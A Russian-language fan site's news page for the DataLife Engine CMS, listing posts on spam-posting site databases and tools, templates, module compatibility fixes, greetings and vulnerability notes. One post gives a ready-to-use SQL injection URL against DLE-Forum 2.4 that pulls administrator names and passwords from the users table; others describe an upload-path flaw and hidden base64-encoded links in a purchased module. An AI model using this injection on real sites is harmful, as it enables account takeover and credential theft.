Поиск по сайту
Вход на сайт
Обратите внимание
Топ-новости
Архив сайта
Апрель 2016 (1)
Апрель 2014 (1)
Ноябрь 2013 (1)
Октябрь 2013 (1)
Май 2013 (2)
Апрель 2013 (8)
Партнеры

seo-monster.ru - сервис проверки доменов
хочешь такой же информер? Информер ТИЦ и PR

Наша группа в "Вконтакте"

У нас появилась группа!

База DLE SUPERPOST 12.06.2010

База DLE SUPERPOST 12.06.2010 -Это лучший сборник сайтов на движке DLE.База собиралась в ручном режиме,все сайты на дату 12.06.2010 100% работают.База DLE SUPERPOST 12.06.2010 облегчит жизнь всем кто занимается постингом новостей на сайтах DLE в составе базы 577 отборных сайта + программа для определения посещяемости сайта + программа для безошибочного постинга на сайте qiq.ru + гениратор текстов новостей.

Макет сайта хостинг-провайдера

Подробности в полной новости.

SQL – инъекция в DLE-Forum 2.4
В DLE Forum 2.4 есть уязвимость, которая позволяет выполнять запросы в бд, и узнавать любую инфу, например о логинах и о паролях.
У кого стоит данная версия форума, рекомендуется проверить на уязвимость:

ваш_сайт.ру/?do=forum&showtopic=-1+union+select+1,2,CONCAT_WS(0x3a,name,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+dle_users+where+user_group=1+limit+1-- ,

Данный баг позволяет просто скачать список доп. полей новостей и юзеров

DLE уязвимость работает на версиях: ВСЕ DLE

Уровень риска: Низкая

Данный баг позволяет производить прямой запуск файлов и мусорить в папках

DLE уязвимость работает на версиях: ВСЕ DLE

Уровень риска: Низкая (На данный момент, работает только если у пользователя есть права администратора)

DLE уязвимость - Недостаточная фильтрация входящих данных
Очередная DLE уязвимость


Суть DLE уязвимости: Если у вас на сайте есть пользователи которым разрешена загрузка фалов(не картинок) на сайт, то этот юзер имеет возможность указать путь загрузки не типичный для сохранения загружаемых файлом. Ещё хуже если юзер имеет права админа. В этом случае он может заменить своим файлом существующий и запустить его. Тем самым сделать он сможет что угодно с вашим сайтом. Тут уж дело за его фантазией и навыками.
DLE уязвимость работает на версиях: любые DLE

Уровень риска: Средняя (Высокая при наличии админов на сайте кроме вас самих хотя и Вас могут взломать и сделать каку)

РingationMod 2.0.2 для DataLife Engine

РingationMod 2.0.2 для DataLife Engine

Модуль "pingationMod" служит для своевременного уведомления пинг сервисов об изменениях на Вашем сайте. Сервисы для пинга – это сервисы, которые информируют поисковые системы о том, что на вашем сайте появилась очередная публикация. В результате роботы поисковых систем быстрее узнают о том, что вы написали новую статью и заходят на ваш сайт, чтобы ее проиндексировать.

Сходка dle.net.ua №1 в Киеве


Предлагаю организовать первую сходку в Киеве.
Подробней смотрим в полной новости

С 8 марта!


Поздравляю всех девушек с 8 марта!
И наверняка они есть среди посетителей сайта хоть и не много.
Девушки! Желаю Вам успехов, здоровья, красоты, любви и женского счастья! :)

Ну и конечно чтобы ваш сайт на DLE никогда не глючил и не падал
Чтобы счетчики просто зашкаливали, а тИЦ вообще не вмещался ни в какие рамки! :)

Скрытые ссылки в модулях от Necrom


Купил у Necrom модуль Значение имени. В модуле в двух файлах находится зашифрованный в base64 код. После расшифровки увидел несколько ссылок на сайт, анкор буквально целая статья. Естественно скрыто под display:none. Прилагаю дискуссию по аське.

Shell dle Null

Очень часто владельцы сайтов о dle перезаливают архивы с релизами dle со своими файлами. Любой пользователь может оказаться жертвой действий таких админов.

Отлична база DLE сайтов для постинга + шаблоны

Отлична база DLE сайтов для постинга + шаблоны

Отлична база посещаемых DLE сайтов для постинга новостей с шаблонами под программу AddNews.


DLE шаблон Soft-Fix для варезного портала.

Название шаблона: DLE шаблон Soft-Fix для варезного портала.
Ширина: Шаблон растягивается по ширине монитора
Тестировался на: Datalife Engine 7.5-8.0, Internet Explorer 8,0/7.0, Mozilla Firefox, Opera, Safari, Chrome
Включает: Шаблон, CSS, PSD, TTF.
ICQ: 430371084 ИлИ 5362688
e-mail: tors.pro@mail.ru
Цена: 5$
Снять с продажи шаблон: Договорная.

Автор сего труда: PaRk0uR
Проблема: Изменения в модулях!

Версии 8.0 и выше



Как мы уже все знаем что начиная с выпуска DLE 7.5 некоторые модули не хотели подключатся или работали неправильно в админ центре. Начиная с DLE 8.0 появилась новая функция разрешить некоторым группам доступ к админ панели. Сейчас начиная с DLE 8.0 всё модули которые были написаны раньше уже не станут!!! Для этого я Разработал Баг Фикс для Модулей!!!!
Итак сначала обсудим изменения:

1. Файл engine/inc/functions.inc.php был перенесён в engine/inc/include/functions.inc.php
Если у вас возникла проблема:
Warning: require_once(Ваши данные/www/engine/inc/functions.inc.php): failed to open stream]
Есть два решения!
1.1 Вы заходите в файл в котором выбилась ошибка и просто меняете дерикторию дописывая include
1.2 Заходите в папку engine/inc/include/ копируете functions.inc.php и вставляете в engine/inc/ .


2. Добавлен новый класс API
Теперь в DLE 8.0 есть новая возможность интеграции модулей в CMS DLE.
Сам класс находится вот сдесь: engine/api/api.class.php
Почитать подробней можна вот тут: engine/api/readme.txt


3. Изменения в engine/inc/options.php
Теперь цифры заменяються на слова =))
Ранше было так:

array(
'name' => Hallo,
'url' => "$PHP_SELF?mod=v1",
'descr' => Hello,
'image' => "demo.png",
'access' => "1",
),

А теперь:

array(
'name' => Hallo,
'url' => "$PHP_SELF?mod=v1",
'descr' => Hello,
'image' => "demo.png",
'access' => "admin",
),


4. Изменения в admin.php
Раньше было:

'blockip' => 'admin',

А стало:

'blockip',



5. Незыбываем баг фикс с DLE 7.5
Открываем админку своего модуля: engine/inc/****.php
Ищим
  if(!defined('DATALIFEENGINE'))
  {
    die("Hacking attempt!");
  }


  if($member_db[1] != 1)   { msg($langvip['title_error'], $lang['addnews_denied'], $lang['db_denied']); }

Меняем на

if( ! defined( 'DATALIFEENGINE' ) ) {
    die( "Hacking attempt!" );
}

if( ! $user_group[$member_id['user_group']]['admin_addnews'] ) {
    msg( "error", $lang['index_denied'], $lang['index_denied'] );
}



Пока всё но скоро будет и новая статья!!! Пока пишите коменты!

PostNews 3.0 - постинг на DLE - сайты

Данная программа предназначена для постинга новостей на DLE сайты. Главной ее особенностью является многопоточность, имеется ввиду возможность одновременной регистрации/постинга сразу на нескольких сайтах.

ХРИСТОС ВОСКРЕС!


ХРИСТОС ВОСКРЕС!
С ПРАЗДНИКОМ!

Состоялся выход бесплатной демонстрационной версии DataLife Engine 7.3.

DataLife Engine v.7.3 (демоверсия)


Напоминаем вам что данный релиз содержит следующие ограничения:
1. Закрытый исходный код
2. Максимальное количество новостей - 100
3. Максимальное количество комментариев - 200
4. Отсутствие возможности обновления с предыдущих версий.

Минимальные требования для работы Datalife Engine

PHP 4.3.2+ или PHP 5.0+
MySQL 4.0+ или MySQL 5.0+

Эта версия отлично подходит для сайтов с количеством новостей не превышающим указанные параметры.

Проблема: Недостаточная фильтрация входящих данных.

Ошибка в версии: все версии

Степень опасности: Средняя

Дистрибутив версии 7.3 обновлен.

Data Life Engine - Stein T.E.A.M. 2.5


Новая версия сборки Data Life Engine, чье бывшее кодовое название Маккой, сменилось на Stein T.E.A.M. из-за образования команды. Теперь проблем стало намного меньше. Более подробно дальше...

Вернуться назад << 1 2 3 >> Следующая страница
Вверх